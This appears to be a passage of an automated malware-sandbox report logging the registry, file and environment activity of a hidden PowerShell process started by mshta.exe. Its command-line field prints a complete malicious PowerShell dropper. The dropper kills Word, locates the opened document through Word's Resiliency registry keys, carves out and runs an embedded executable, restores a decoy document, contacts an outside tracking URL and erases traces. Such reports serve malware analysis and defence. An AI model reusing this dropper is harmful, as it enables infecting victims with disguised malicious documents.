| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe, size = 2048 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
110 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\aETAdzjz\AppData\Roaming |
|
2 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | "C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe" -WindowStyle Hidden Try{$ada="""$env:APPDATA\result.exe""";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf="""$env:TEMP\o.tmp""";taskkill /f /im winword.exe;Function pr{Try{$k="""HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency\StartupItems\""";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path """HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency""" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword """$r""";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\).Path;ri """$cd\*""" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;} |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:07, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:29 |
| Information | Value |
|---|---|
| PID | 0x2ac |
| Parent PID | 0xbc0 (c:\windows\system32\mshta.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
658
0x
A0C
0x
A14
0x
9A8
0x
A48
0x
A58
0x
9AC
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\roaming\result.exex | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Roaming\result.exex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
4 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
9 | |
| Get Info | C:\Users\aETAdzjz | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
7 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\result.exex | type = file_type |
|
2 | |
| Get Info | C:\Windows\system32\taskkill.exe | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Read | - | size = 4096, size_out = 4096 |
|
49 | |
| Read | - | size = 4096, size_out = 3315 |
|
1 | |
| Read | - | size = 781, size_out = 0 |
|
1 | |
| Read | - | size = 4096, size_out = 0 |
|
3 | |
| Read | - | size = 4096, size_out = 436 |
|
1 | |
| Read | - | size = 4096, size_out = 2530 |
|
1 | |
| Read | - | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
73 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | - | size = 51 |
|
2 | |
| Write | - | size = 1 |
|
22 | |
| Write | - | size = 18 |
|
1 | |
| Write | - | size = 79 |
|
15 | |
| Write | - | size = 55 |
|
1 | |
| Write | - | size = 20 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
9 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems | - |
|
24 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems | - |
|
10 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency | - |
|
20 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
7 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
7 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
7 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
7 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
7 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency | - |
|
10 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
12 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
12 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
10 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
7 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
7 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
7 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
7 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
7 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
7 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
7 | |
